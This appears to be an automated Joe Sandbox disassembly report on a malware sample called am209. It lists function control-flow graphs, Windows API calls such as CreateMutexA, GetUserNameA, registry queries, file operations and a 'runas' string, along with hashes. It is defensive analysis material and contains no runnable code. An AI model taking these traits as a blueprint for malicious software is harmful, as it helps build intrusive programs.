                                                                                                                                                                                                                                                    control_flow_graph 445 6d39bf-6d39ef call 6d370d 448 6d3a0a-6d3a16 call 6ca285 445->448 449 6d39f1-6d39fc call 6c116f 445->449 454 6d3a2f-6d3a78 call 6d3678 448->454 455 6d3a18-6d3a2d call 6c116f call 6c1182 448->455 456 6d39fe-6d3a05 call 6c1182 449->456 465 6d3a7a-6d3a83 454->465 466 6d3ae5-6d3aee GetFileType 454->466 455->456 463 6d3ce4-6d3ce8 456->463 470 6d3aba-6d3ae0 GetLastError call 6c114c 465->470 471 6d3a85-6d3a89 465->471 467 6d3b37-6d3b3a 466->467 468 6d3af0-6d3b21 GetLastError call 6c114c CloseHandle 466->468 474 6d3b3c-6d3b41 467->474 475 6d3b43-6d3b49 467->475 468->456 484 6d3b27-6d3b32 call 6c1182 468->484 470->456 471->470 476 6d3a8b-6d3ab8 call 6d3678 471->476 479 6d3b4d-6d3b9b call 6ca1d0 474->479 475->479 480 6d3b4b 475->480 476->466 476->470 487 6d3b9d-6d3ba9 call 6d3887 479->487 488 6d3bba-6d3be2 call 6d3425 479->488 480->479 484->456 487->488 494 6d3bab 487->494 495 6d3be4-6d3be5 488->495 496 6d3be7-6d3c28 488->496 497 6d3bad-6d3bb5 call 6c8229 494->497 495->497 498 6d3c49-6d3c57 496->498 499 6d3c2a-6d3c2e 496->499 497->463 500 6d3c5d-6d3c61 498->500 501 6d3ce2 498->501 499->498 503 6d3c30-6d3c44 499->503 500->501 504 6d3c63-6d3c96 CloseHandle call 6d3678 500->504 501->463 503->498 508 6d3c98-6d3cc4 GetLastError call 6c114c call 6ca398 504->508 509 6d3cca-6d3cde 504->509 508->509 509->501
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 006D3678: CreateFileW.KERNELBASE(00000000,?,?,h:m,?,?,00000000,?,006D3A68,00000000,0000000C), ref: 006D3695
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 006D3AD3
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 006D3ADA
                                                                                                                                                                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 006D3AE6
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 006D3AF0
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 006D3AF9
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 006D3B19
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(006C7311), ref: 006D3C66
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 006D3C98
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 006D3C9F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                    • Opcode ID: 039be96fad2d8168021c9b1e1649a6ac933fd66127b5423258dddb4a31a7e64f
                                                                                                                                                                                                                                                    • Instruction ID: 115e2c175036ae1df117c37bdaf963f9154d3b33c72d2d996f22040db0bff8ee
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 039be96fad2d8168021c9b1e1649a6ac933fd66127b5423258dddb4a31a7e64f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0A1F732E041589FDF199F68DC52BED3BA2EB06324F18015EF811EF391DA359A12C756
                                                                                                                                                                                                                                                    Function 006989E0 Relevance: 12.9, APIs: 6, Strings: 1, Instructions: 639sleepthreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 514 6989e0-698a31 Sleep 515 698abe-698b34 call 6b4170 * 3 CreateThread Sleep 514->515 516 698a37-698a4b call 6b9a02 514->516 529 698b62-698b7a 515->529 530 698b36-698b42 515->530 516->515 521 698a4d-698abb call 6b9f41 call 6b99b8 516->521 521->515 534 698b7c-698b88 529->534 535 698ba4-698bbc 529->535 532 698b58-698b5f call 6b9f56 530->532 533 698b44-698b52 530->533 532->529 533->532 536 698bf8-698c3e call 6bef49 533->536 538 698b9a-698ba1 call 6b9f56 534->538 539 698b8a-698b98 534->539 540 698bbe-698bca 535->540 541 698be6-698bf7 535->541 552 698df1 call 6926a0 536->552 553 698c44-698c84 call 6b5840 call 6b4810 536->553 538->535 539->536 539->538 545 698bdc-698be3 call 6b9f56 540->545 546 698bcc-698bda 540->546 545->541 546->536 546->545 556 698df6 call 6bef49 552->556 563 698cb2-698d34 call 6b3260 * 2 call 6961f0 call 6b4170 call 698700 553->563 564 698c86-698c92 553->564 560 698dfb-698eca call 6bef49 call 6b3260 call 6961f0 call 6b4810 call 6b3260 call 6961f0 call 6b4170 call 698700 556->560 613 698ecc-698ed8 560->613 614 698ef4-698f05 Sleep 560->614 590 698d62-698d68 563->590 591 698d36-698d42 563->591 567 698ca8-698caf call 6b9f56 564->567 568 698c94-698ca2 564->568 567->563 568->556 568->567 593 698d6a-698d76 590->593 594 698d92-698daa 590->594 595 698d58-698d5f call 6b9f56 591->595 596 698d44-698d52 591->596 599 698d88-698d8f call 6b9f56 593->599 600 698d78-698d86 593->600 601 698dac-698db8 594->601 602 698dd4-698df0 call 6b98e0 594->602 595->590 596->560 596->595 599->594 600->560 600->599 606 698dca-698dd1 call 6b9f56 601->606 607 698dba-698dc8 601->607 606->602 607->560 607->606 616 698eea-698ef1 call 6b9f56 613->616 617 698eda-698ee8 613->617 618 698f2f-698f3e 614->618 619 698f07-698f13 614->619 616->614 617->616 620 698f3f call 6bef49 617->620 622 698f25-698f2c call 6b9f56 619->622 623 698f15-698f23 619->623 626 698f44-698f9d call 6bef49 call 697d20 620->626 622->618 623->622 623->626 633 698f9f 626->633 634 698fa1-698fae SetCurrentDirectoryA 626->634 633->634 635 698fdc-69909d call 6b3260 call 6961f0 call 6b3260 call 6961f0 call 6b4810 call 6b5660 call 6b3260 call 6961f0 call 6b4170 call 698700 634->635 636 698fb0-698fbc 634->636 668 6990cb-6990e3 635->668 669 69909f-6990ab 635->669 638 698fbe-698fcc 636->638 639 698fd2-698fd9 call 6b9f56 636->639 638->639 641 699194 call 6bef49 638->641 639->635 647 699199 call 6bef49 641->647 650 69919e-6991a3 call 6bef49 647->650 672 699111-699129 668->672 673 6990e5-6990f1 668->673 670 6990ad-6990bb 669->670 671 6990c1-6990c8 call 6b9f56 669->671 670->647 670->671 671->668 674 69912b-699137 672->674 675 699153-699159 672->675 677 6990f3-699101 673->677 678 699107-69910e call 6b9f56 673->678 679 699149-699150 call 6b9f56 674->679 680 699139-699147 674->680 681 69915b-699167 675->681 682 699183-699193 675->682 677->647 677->678 678->672 679->675 680->647 680->679 686 699179-699180 call 6b9f56 681->686 687 699169-699177 681->687 686->682 687->650 687->686
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064,495BF602,?,00000000,006D900D,000000FF), ref: 00698A1C
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00698AB6
                                                                                                                                                                                                                                                      • Part of subcall function 006B99B8: EnterCriticalSection.KERNEL32(006F8FA8,?,?,00692E3C,006FCDC4,006DCB50), ref: 006B99C2
                                                                                                                                                                                                                                                      • Part of subcall function 006B99B8: LeaveCriticalSection.KERNEL32(006F8FA8,?,?,00692E3C,006FCDC4,006DCB50), ref: 006B99F5
                                                                                                                                                                                                                                                      • Part of subcall function 006B99B8: WakeAllConditionVariable.KERNEL32(?,00692E3C,006FCDC4,006DCB50), ref: 006B9A6C
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00698880,006FC578,00000000,00000000), ref: 00698B1B
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00698B26
                                                                                                                                                                                                                                                      • Part of subcall function 006B9A02: EnterCriticalSection.KERNEL32(006F8FA8,?,?,?,00692E1C,006FCDC4), ref: 006B9A0D
                                                                                                                                                                                                                                                      • Part of subcall function 006B9A02: LeaveCriticalSection.KERNEL32(006F8FA8,?,?,?,00692E1C,006FCDC4), ref: 006B9A4A
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00698EF9
                                                                                                                                                                                                                                                      • Part of subcall function 006926A0: ___std_exception_copy.LIBVCRUNTIME ref: 006926E2
                                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(00000000,495BF602), ref: 00698FA2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Sleep$EnterLeave$ConditionCreateCurrentDirectoryInit_thread_footerThreadVariableWake___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: runas
                                                                                                                                                                                                                                                    • API String ID: 91779485-4000483414
                                                                                                                                                                                                                                                    • Opcode ID: 66dc1ca567e22314a2dbc9fc51a2341f8eddb879e07dad8ad322ac765ae95b8c
                                                                                                                                                                                                                                                    • Instruction ID: fdc2ba8e40bdd25bc411351d5c5b0d0537505f44b7e4517ce195fba897f11312
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66dc1ca567e22314a2dbc9fc51a2341f8eddb879e07dad8ad322ac765ae95b8c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE2216B1A10248AFDF08DF68CD46BAD7B6BEF46310F10825CF4149B7C2DB759A848B95
                                                                                                                                                                                                                                                    Function 006D3678 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 749 6d3678-6d369c CreateFileW
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,?,h:m,?,?,00000000,?,006D3A68,00000000,0000000C), ref: 006D3695
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                    • String ID: h:m
                                                                                                                                                                                                                                                    • API String ID: 823142352-2939125782
                                                                                                                                                                                                                                                    • Opcode ID: e38a6c3600eca18ed29cc112ed4e88932d2d99f7c7c5e108bd0159d2fa41253a
                                                                                                                                                                                                                                                    • Instruction ID: dbc80b881c44cca156cb03ef1f13841287d31953d849c6a2e720eac4de59e837
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e38a6c3600eca18ed29cc112ed4e88932d2d99f7c7c5e108bd0159d2fa41253a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01D06C3200024DBFDF028F84DD46EDA3FAAFB48714F014000BA185A020C732E821AB90
                                                                                                                                                                                                                                                    Function 006A1DD0 Relevance: 3.3, APIs: 2, Instructions: 315COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 750 6a1dd0-6a1e6c call 6a1210 call 6b3260 call 6961f0 757 6a1e72-6a1ed9 call 6b5840 call 6b5660 call 6b31a0 750->757 758 6a21e7 call 6926a0 750->758 772 6a1f0a-6a1f17 757->772 773 6a1edb-6a1eea 757->773 761 6a21ec call 6bef49 758->761 765 6a21f1-6a2227 call 6be6e6 call 6b3220 call 6b3260 761->765 792 6a222b-6a223e call 6b3220 call 698700 765->792 777 6a1f48-6a1f55 772->777 778 6a1f19-6a1f28 772->778 775 6a1eec-6a1efa 773->775 776 6a1f00-6a1f07 call 6b9f56 773->776 775->761 775->776 776->772 783 6a1f86-6a1fb7 GetModuleFileNameA 777->783 784 6a1f57-6a1f66 777->784 781 6a1f2a-6a1f38 778->781 782 6a1f3e-6a1f45 call 6b9f56 778->782 781->761 781->782 782->777 786 6a1fc1-6a1fc6 783->786 789 6a1f68-6a1f76 784->789 790 6a1f7c-6a1f83 call 6b9f56 784->790 786->786 793 6a1fc8-6a202f call 6b4170 call 6b5af0 786->793 789->761 789->790 790->783 802 6a2243 792->802 805 6a2068-6a206f 793->805 806 6a2031-6a203c 793->806 804 6a2246-6a2248 call 6bde7e 802->804 815 6a224d-6a2252 call 6bef49 804->815 807 6a2146-6a2149 805->807 808 6a2075-6a2091 call 6be100 805->808 810 6a203e-6a204c 806->810 811 6a2052-6a2062 call 6b9f56 806->811 813 6a214b-6a2156 807->813 814 6a2176-6a219a 807->814 808->765 824 6a2097-6a20a4 call 699ed0 808->824 810->811 810->815 811->805 820 6a2158-6a2166 813->820 821 6a216c-6a2173 call 6b9f56 813->821 818 6a21cb-6a21e6 call 6b98e0 814->818 819 6a219c-6a21ab 814->819 825 6a21ad-6a21bb 819->825 826 6a21c1-6a21c8 call 6b9f56 819->826 820->815 820->821 821->814 836 6a20ba-6a20c7 call 699ed0 824->836 837 6a20a6-6a20b4 call 6b30d0 CreateDirectoryA 824->837 825->815 825->826 826->818 842 6a20fa-6a2100 call 699ea0 836->842 843 6a20c9-6a20f2 call 6b3260 call 69a8c0 call 6a1080 836->843 837->836 846 6a2105-6a2107 842->846 854 6a20f7 843->854 846->804 848 6a210d-6a2141 call 6b3220 call 6b3260 846->848 848->792 854->842
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,00000000,?,7FFFFFFF,?,?,006EDBE0,00000001), ref: 006A1F94
                                                                                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 006A20B4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateDirectoryFileModuleName
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3341437400-0
                                                                                                                                                                                                                                                    • Opcode ID: 26e178da114b3778ac5d94b6b296c9d3585f7c081451f25b17cf244b0b477dee
                                                                                                                                                                                                                                                    • Instruction ID: 0d7a0fe1c53261a484544496ed8c73ac6ded106b6d80fe280b1450799c85e324
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26e178da114b3778ac5d94b6b296c9d3585f7c081451f25b17cf244b0b477dee
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07C1BF71A102589BDF29EB28CC957EDBB76AF46300F5041C8E509AB292DB315FC4CF95
                                                                                                                                                                                                                                                    Function 0069E8D0 Relevance: 3.3, APIs: 2, Instructions: 305COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 0069E91D
                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0069EC54
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeNameUser
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2272643758-0
                                                                                                                                                                                                                                                    • Opcode ID: 946e65cdac7ea17d1d9afe03e8748a0cf2edcef865b323965442e8e0395ec2f9
                                                                                                                                                                                                                                                    • Instruction ID: 1e0ff292505bde3baeb7704c862f6ba90cfc41459c4c44b0d2ab2cdc42a01c49
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 946e65cdac7ea17d1d9afe03e8748a0cf2edcef865b323965442e8e0395ec2f9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DE12670A1426DDBDF20DF28CD887CDBBB6AF05308F5081D9E409A7281D7799A88CF91
                                                                                                                                                                                                                                                    Function 006B0CD0 Relevance: 3.0, APIs: 2, Instructions: 23sleepthreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0069C730: Sleep.KERNELBASE(00000096), ref: 0069C6D6
                                                                                                                                                                                                                                                      • Part of subcall function 0069C730: CreateMutexA.KERNELBASE(00000000,00000000,006F7494), ref: 0069C6F4
                                                                                                                                                                                                                                                      • Part of subcall function 0069C730: GetLastError.KERNEL32 ref: 0069C6FC
                                                                                                                                                                                                                                                      • Part of subcall function 0069C730: GetLastError.KERNEL32 ref: 0069C70D
                                                                                                                                                                                                                                                      • Part of subcall function 006961F0: RegOpenKeyExA.ADVAPI32(?,00000000), ref: 006967BD
                                                                                                                                                                                                                                                      • Part of subcall function 006961F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00696894
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,006B0C10,00000000,00000000,00000000), ref: 006B0CB0
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00007530), ref: 006B0CC5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateErrorLastSleep$InfoMutexOpenQueryThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1773385304-0
                                                                                                                                                                                                                                                    • Opcode ID: 0d2c64926895698a1d4cdcac7bc54c5253d79a48dc3d944b3fa28a9524d83c3a
                                                                                                                                                                                                                                                    • Instruction ID: c093c4f4661f9fcd3df6689f1ead66a86d7663cf2c4a1dd036ea9cca3ed44fa3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d2c64926895698a1d4cdcac7bc54c5253d79a48dc3d944b3fa28a9524d83c3a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39E08C74284304A6F3A037E05C0BF9A3D075B03BA1F341219B2092E1D25FE079805AEF
                                                                                                                                                                                                                                                    Function 006A1080 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 925 6a1080-6a117c call 6b5280 * 2 SHFileOperationA 932 6a11a6-6a11be 925->932 933 6a11e8-6a1203 call 6b98e0 932->933 934 6a11c0-6a11cc 932->934 935 6a11de-6a11e5 call 6b9f56 934->935 936 6a11ce-6a11dc 934->936 935->933 936->935 938 6a1204-6a1209 call 6bef49 936->938
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a690808f22e98c2f9993be3d124c66df4fe56adb86ef14cdae2700832fcf6bd2
                                                                                                                                                                                                                                                    • Instruction ID: 08d721527f9430b1169f05a5dca57327d70d44375396e2329a0e4ba46b873fb9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a690808f22e98c2f9993be3d124c66df4fe56adb86ef14cdae2700832fcf6bd2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E131AE71A10248AFDB04DFA8CD85BDEBBB6FF4A304F504219F905AB281D775DA80CB94
                                                                                                                                                                                                                                                    Function 006C72D2 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 944 6c72d2-6c72f8 call 6c70a8 947 6c72fa-6c730c call 6d399f 944->947 948 6c7351-6c7354 944->948 950 6c7311-6c7316 947->950 950->948 951 6c7318-6c7350 950->951
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __wsopen_s
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3347428461-0
                                                                                                                                                                                                                                                    • Opcode ID: 540e72d034661b48903655a87adcf6bd83e74da14ed8e9a30e1400924d00b9f2
                                                                                                                                                                                                                                                    • Instruction ID: 2e5b130ad638b4051b498c598f43ec0802c0464392fde8ba2000da5ced23f82a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 540e72d034661b48903655a87adcf6bd83e74da14ed8e9a30e1400924d00b9f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25111572A0420AAFCF05DF59E945E9E7BF5EF48304F044069F809AB351D670EA11CBA5
                                                                                                                                                                                                                                                    Function 006D3931 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 952 6d3931-6d3965 call 6be839 call 6be81c 957 6d396c-6d3981 call 6d39bf 952->957 958 6d3967-6d396a 952->958 961 6d3986-6d3989 957->961 959 6d398b-6d398f 958->959 962 6d399a-6d399e 959->962 963 6d3991-6d3999 call 6c80d6 959->963 961->959 963->962
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free
